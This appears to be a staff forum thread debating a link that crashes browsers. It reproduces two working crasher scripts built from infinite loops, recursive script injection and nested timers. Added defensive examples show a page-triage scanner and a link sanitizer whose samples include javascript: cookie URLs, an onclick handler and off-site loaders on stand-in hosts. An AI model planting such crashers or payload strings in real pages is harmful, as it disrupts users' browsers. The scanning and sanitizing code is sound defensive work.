
What does that function do?
Well done, it's not malicious:
Code:
<script type="text/javascript">
function str_shuffle (str) {
  // http://kevin.vanzonneveld.net
  // + original by: Brett Zamir (http://brett-zamir.me)
  // * example 1: shuffled = str_shuffle("abcdef");
  // * results 1: shuffled.length == 6
  if (str == undefined) {
    throw 'Wrong parameter count for str_shuffle()';
  }
  var getRandomInt = function (max) {
    return Math.floor(Math.random() * (max + 1));
  };
  var newStr = '', rand = 0;
  while (str.length) {
    rand = getRandomInt(str.length-1);
    newStr += str.charAt(rand);
    str = str.substring(0, rand)+str.substr(rand+1);
  }
  return newStr;
}
function detonate() { setTimeout('boom();', 1000); }
function boom() { while(1) { explode(); } }
function explode() {
  str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209NT098N4208TNnasonBONBONCX' );
  str = str.substring(0, 10);
  document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}
detonate();
</script>
I am going to reply to this to correct what you are saying, Chippiewill. I don't mean to sound patronizing here - it's just I'm not sure you're fully aware of what Agnostic Bear posted yourself. This is the link Bear posted:
http://imgbear.com/news.html
This is the source code:
HTML Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Premium News</title>
<style type="text/css">
body { background-color: white; margin: 40px; padding: 0px; font-family: Segoe UI, Arial, Helvetica, sans-serif; font-size: 16px; }
h1, h2, h3 { font-weight: normal; margin: 0px; padding: 0px; font-family: Georgia, times, serif; }
h3 { margin-left: 20px; }
p { margin-left: 15px; margin-top: 3px; }
</style>
<script type="text/javascript">
function str_shuffle (str) {
  // http://kevin.vanzonneveld.net
  // + original by: Brett Zamir (http://brett-zamir.me)
  // * example 1: shuffled = str_shuffle("abcdef");
  // * results 1: shuffled.length == 6
  if (str == undefined) {
    throw 'Wrong parameter count for str_shuffle()';
  }
  var getRandomInt = function (max) {
    return Math.floor(Math.random() * (max + 1));
  };
  var newStr = '', rand = 0;
  while (str.length) {
    rand = getRandomInt(str.length-1);
    newStr += str.charAt(rand);
    str = str.substring(0, rand)+str.substr(rand+1);
  }
  return newStr;
}
function detonate() { setTimeout('boom();', 1000); }
function boom() { while(1) { explode(); } }
function explode() {
  str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209NT098N4208TNnasonBONBONCX' );
  str = str.substring(0, 10);
  document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}
detonate();
</script>
</head>
<body>
<h1>Hello! This page has caused you to crash.</h1>
<br /><br />
<h2><strong>Firefox:</strong><br /><h3>Your entire browser has crashed. Well done.</h3></h2><br />
<h2><strong>Google Chrome:</strong><br /><h3> Your tab has crashed. If pre-loading has opened this page, you wont see this or have any idea what caused your crash.
Sorry about that.</h3></h2><br />
<h2><strong>Opera:</strong><br /><h3> Your tab has crashed. I have no idea if Opera has pre-loading, if so, it may have killed the tab this was loaded in.</h3></h2><br />
<h2><strong>Internet Explorer (7/8/9):</strong><br /><h3> You will shortly receive a message asking you to stop execution of javascript on this page. I suggest clicking yes.</h3></h2><br />
<h2><strong>Internet Explorer 6:</strong><br /><h3> Your computer <em>may</em> have melted. Be on the lookout for molten metal burning <strong>everything</strong>.</h3></h2>
</body>
</html>
Why am I posting this here? Because it is harmless. You seem to be under the impression that this is some sort of dangerous remote code execution, when it's not. It's completely harmless and puts the user at no risk. I've just created another page that has a similar effect:
http://develop.davzy.com/test1.php
source:
HTML Code:
This will die.
<script>
function kill() {
  while(1) {
    setInterval(function(){
      kill(); kill(); kill(); kill(); kill(); kill(); kill(); kill(); kill();
      kill(); kill(); kill(); kill(); kill(); kill(); kill(); kill(); kill();
    },1);
  }
}
kill();
</script>
So not only did I click his link, but beforehand I looked at the page source, and identified it as harmless. Essentially what these scripts are doing is creating infinite loops which eventually consume so many system resources that they're closed. There is zero percent risk of gaining any sort of infection from visiting either of the sites above.
I'm not crazy, ask my toaster.
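The post above settles the question by reading the page source by hand. Below is an added example (not code from any poster in this thread, nor from either site linked above) that automates that first pass: it pulls the inline scripts out of an HTML page and looks for the two things a reviewer wants to separate, signs of unbounded work that stays inside the tab (infinite loops, timers scheduled from inside a loop, document.write of further script) versus signs that the page reaches beyond what the visible source shows (applet/object/embed tags, off-site script sources, network calls). The sample pages are constructed for the example; the first two are condensed from the scripts posted above, and the str_shuffle helper is replaced by Math.random for brevity. The patterns are heuristics: a clean result is a reason to read the source, not a substitute for it.

```javascript
// Added example: heuristic triage of a page's inline scripts.
// Verdicts: 'local-dos' (only burns CPU/memory in the tab), 'needs-further-review'
// (something reaches outside the page), 'no-findings'.

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;

// Signs of unbounded or self-replenishing work inside the tab.
const EXHAUSTION_PATTERNS = [
  { name: 'unbounded-loop',   re: /\b(while\s*\(\s*(1|true)\s*\)|for\s*\(\s*;\s*;\s*\))/ },
  { name: 'timer-in-loop',    re: /\b(while|for)\b[\s\S]{0,200}?\bset(Interval|Timeout)\s*\(/ },
  { name: 'script-injection', re: /document\.write\s*\([\s\S]{0,200}?<\s*\/?\s*scr/i },
];

// Signs that the page pulls in something the visible source does not show.
const REACH_PATTERNS = [
  { name: 'plugin-or-applet', re: /<\s*(applet|object|embed)\b/i },
  { name: 'external-script',  re: /<script\b[^>]*\bsrc\s*=\s*["']?(https?:)?\/\//i },
  { name: 'network-call',     re: /\b(XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon)/ },
];

// Bodies of every inline <script> element, in document order.
function inlineScripts(html) {
  const bodies = [];
  SCRIPT_RE.lastIndex = 0;
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

function triagePage(html) {
  const exhaustion = new Set();
  for (const body of inlineScripts(html)) {
    for (const p of EXHAUSTION_PATTERNS) if (p.re.test(body)) exhaustion.add(p.name);
  }
  const reach = REACH_PATTERNS.filter(p => p.re.test(html)).map(p => p.name);
  let verdict = 'no-findings';
  if (reach.length) verdict = 'needs-further-review'; // the visible source alone does not settle it
  else if (exhaustion.size) verdict = 'local-dos';     // annoying, but confined to the tab
  return { verdict, exhaustion: [...exhaustion].sort(), reach };
}

// Constructed sample 1: condensed from the imgbear.com/news.html script posted above.
const SAMPLE_CRASHER = `<html><head><title>Premium News</title>
<script type="text/javascript">
function detonate() { setTimeout('boom();', 1000); }
function boom() { while(1) { explode(); } }
function explode() {
  var str = Math.random().toString(36).substring(2, 12);
  document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}
detonate();
</script></head><body><h1>Hello! This page has caused you to crash.</h1></body></html>`;

// Constructed sample 2: condensed from the test1.php script posted above.
const SAMPLE_KILL = `This will die. <script> function kill() { while(1) { setInterval(function(){ kill(); kill(); kill(); },1); } } kill(); </script>`;

// Constructed sample 3: an ordinary bounded loop, nothing to report.
const SAMPLE_BENIGN = `<html><body><span id="n"></span><script>
for (var i = 0; i < 10; i++) { document.getElementById('n').textContent = i; }
</script></body></html>`;

// Constructed sample 4: same loop, but the page also loads off-site code
// (example.invalid is a reserved name, so this never resolves).
const SAMPLE_REACH = `<html><body>
<applet code="Demo.class" archive="http://example.invalid/demo.jar"></applet>
<script src="http://example.invalid/loader.js"></script>
<script>while(true){}</script>
</body></html>`;

const SAMPLES = { crasher: SAMPLE_CRASHER, kill: SAMPLE_KILL, benign: SAMPLE_BENIGN, reach: SAMPLE_REACH };
for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(8), JSON.stringify(triagePage(html)));
}
```

Run it with node and the two posted pages come back as local-dos with no reach findings, the bounded loop comes back clean, and the applet page comes back as needs-further-review even though its inline loop is the same kind of thing: the point of the second pattern set is that an inline loop is only "harmless" once you know nothing else is being loaded.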
You expect me to believe that?
The point wasn't whether it was harmless or not, I never said it actually was, the point was the clicking on potentially malicious links. THEY CAN BE ANYWHERE. If targeted anybody can fall for one, it's just unfortunate that somebody did. Particularly with something like a forum, it only takes one person.
Chippiewill.
Could have told me it would reset my cookies
I like cookies
-shrugs- if you don't believe me there's not much I can do, but I checked the source out because the link originated from this thread, where the first sentence is "This will crash Firefox, I believe it will force ram usage into 2gb+ given enough time.". A compelling reason to check source before site, no?
You expect me to believe that?
The point wasn't whether it was harmless or not, I never said it actually was, the point was the clicking on potentially malicious links. THEY CAN BE ANYWHERE. If targeted anybody can fall for one, it's just unfortunate that somebody did. Particularly with something like a forum, it only takes one person.
Chrome requests permission before running Java applets, and naturally you can't force a user to download an executable file and run it with Javascript. Unless I got a virus from elsewhere, or unless there was a nasty vBulletin exploit floating around my forum account is safe.
I'm not crazy, ask my toaster.
Well, maybe you are an ex-spy who watches out for these things. But the average member of staff? No. I hardly think that the 90% of Habbox Staff using IE would be that concerned if it decided to close unexpectedly. And there's the crux of your problem, and until you resolve that with proper educating of all the different signs of vulnerabilities you can't really go round sanctioning people for being prey to these things.
And could someone tell me what it actually is that was posted on the rare values because if it was anything besides plain text then really that's the fault of the person who should be looking to prevent that.
Chippiewill.
Lolsierk got hacked once, is he to be fired too?
Was he actually fired for being "hacked"? Because if so then all he did was get his account compromised - big deal, he's probably learnt from that lesson like anyone else. There's a saying about stuff like this which I can't think of right now, but it's about people being less likely to be a problem after something has happened to them. 5 House Points for anyone who can find the phrase
To be fair to sierk, his account was stolen because of poor housekeeping by Sulake. It wasn’t his fault that someone managed to get into Sulake housekeeping and view passwords. Had sierk been at fault they would never have replaced all his furni, and they did so.
I demand 10 points, so pay up.
Once bitten, twice shy. In other words, have your account compromised once, but if it happens twice, bye bye.
I like others here appreciate you are still fairly new to your role, and I am glad to see some emphasis being placed on this.
I think in the past it's always just been assumed everyone was aware of this, or, since it so seldom happened, that a policy need not be sealed in ink. I agree with you that this active policy needed to be clearly stated, and so I'm happy Matt's decided to incorporate it into the staff handbook, as well as a stickied thread in the staff forums.
In the interest of site security, if staff have been very careless i.e. using the same passwords/email address for Habbo and Habbox they should be fired and not re-hired for a set period of time, regardless of their position. Staff need to be fully aware of the consequences to help prevent them losing their positions they have been entrusted with.
Suspend by all means until a clear picture of the situation is investigated; that doesn't mean automatic reinstatement, and only then do what is necessary. Fire if need be.
Let’s not forget each time an account is compromised it’s not for the same reasons, but 9 out of 10 times it is down to the victim not taking better care.
It's the quality of your posts that count, not the quantity!
Dignity does not consist in possessing honours, but in deserving them.
For a staff member to have their forum account hacked they'd pretty much have to do something wrong. They'd have to have a virus, an easily guessable password, or so on. We won't lose forum accounts because we're clicking links and doing nothing else (especially harmless links such as Agnostic Bear's). I won't discuss the situation with Ouft other than repeating once again that it had nothing to do with clicking dangerous links. Your example does not apply to this scenario.
Well, maybe you are an ex-spy who watches out for these things. But the average member of staff? No. I hardly think that the 90% of Habbox Staff using IE would be that concerned if it decided to close unexpectedly. And there's the crux of your problem, and until you resolve that with proper educating of all the different signs of vulnerabilities you can't really go round sanctioning people for being prey to these things.
And could someone tell me what it actually is that was posted on the rare values because if it was anything besides plain text then really that's the fault of the person who should be looking to prevent that.
If a Help Desk staff member was hacked because of Sulake's own exploit where the staff member did nothing else but visit a post on HabboxForum where the dangerous link was portrayed as a dead image, they would not have been dismissed. If a staff member we have entrusted with backend administrative panels is hacked because they're careless with passwords, they will be dismissed.
With regards to what you said about security on Habbox.com strings are already cleaned for sql insertion and stripped of HTML so only plain text is allowed. However, News Reporters, Content Staff and Senior Rare Reporters all have access to interfaces in which HTML is necessary in order to do their jobs. We trust them with this level of access and we trust them not to get hacked as well.
I'm not crazy, ask my toaster.
A WYSIWYG interface with an outbound URL domain restricter couldn't have worked?
Chippiewill.
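The exchange above ends on a design question: staff editors need HTML, the site strips HTML from everyone else, and the suggestion is a WYSIWYG editor whose links are restricted to approved domains. The block below is an added example of the URL and attribute policy such an editor's sanitizer would apply; it is not Habbox's code and the thread says nothing about how the site actually does this. Assumed for illustration: habbox.com and habbo.com (with their subdomains) are the only hosts a link or image may point to, and relative links resolve against https://www.habbox.com/. The structural part (which tags survive, how the HTML is parsed) belongs to a DOM-based sanitizer; this is the hook it would call per attribute.

```javascript
// Added example: outbound-link policy for staff-authored HTML (not Habbox's code).

const ALLOWED_HOSTS = ['habbox.com', 'habbo.com'];   // assumed for this example
const BASE_URL = 'https://www.habbox.com/';           // assumed: where relative links resolve
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Per tag: attributes that carry a URL, and plain attributes kept verbatim.
const URL_ATTRS = { a: ['href'], img: ['src'] };
const PLAIN_ATTRS = { a: ['title'], img: ['alt', 'width', 'height'] };

function hostAllowed(hostname) {
  return ALLOWED_HOSTS.some(h => hostname === h || hostname.endsWith('.' + h));
}

// Returns the normalised absolute URL if it passes policy, otherwise null.
// Parsing with the WHATWG URL parser, rather than matching the raw string,
// is what defeats the usual tricks: javascript:/data: schemes, protocol-relative
// //evil.example, credentials as in http://habbox.com@evil.example/, and
// look-alike hosts such as habbox.com.evil.example.
function checkOutboundUrl(raw) {
  if (typeof raw !== 'string') return null;
  let url;
  try { url = new URL(raw, BASE_URL); } catch (e) { return null; }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  if (url.username !== '' || url.password !== '') return null;
  if (!hostAllowed(url.hostname)) return null;
  return url.href;
}

// One attribute in, the value to store out (null means drop the attribute).
function filterAttribute(tag, name, value) {
  tag = String(tag).toLowerCase();
  name = String(name).toLowerCase();
  if (name.startsWith('on') || name === 'style') return null;          // handlers and CSS never survive
  if ((URL_ATTRS[tag] || []).includes(name)) return checkOutboundUrl(value);
  if ((PLAIN_ATTRS[tag] || []).includes(name)) return String(value);
  return null;                                                         // everything else is dropped
}

// Apply the policy to every attribute of one element.
function sanitizeAttributes(tag, attrs) {
  const out = {};
  for (const [name, value] of Object.entries(attrs)) {
    const kept = filterAttribute(tag, name, value);
    if (kept !== null) out[name.toLowerCase()] = kept;
  }
  return out;
}

// Constructed sample: attribute sets as a DOM-based sanitizer would hand them over.
const SAMPLE_ELEMENTS = [
  ['a',   { href: '/news/123', title: 'Rare values' }],
  ['a',   { href: 'http://forum.habbox.com/showthread.php?t=1', onclick: 'steal()' }],
  ['a',   { href: 'javascript:alert(document.cookie)' }],
  ['a',   { href: 'http://habbox.com@evil.example/' }],
  ['a',   { href: 'http://habbox.com.evil.example/login' }],
  ['img', { src: '//evil.example/track.gif', alt: 'pixel' }],
  ['img', { src: 'HTTP://WWW.HABBO.COM/images/avatar.png', style: 'position:absolute' }],
];
for (const [tag, attrs] of SAMPLE_ELEMENTS) {
  console.log(tag, JSON.stringify(attrs), '->', JSON.stringify(sanitizeAttributes(tag, attrs)));
}
```

The decision to drop a failing href rather than rewrite it is deliberate: a link that silently points somewhere else is harder for the author to notice than one that disappears. Note also that the domain check is on the parsed hostname, so the credentials and look-alike cases fail for the right reason rather than by luck of string order.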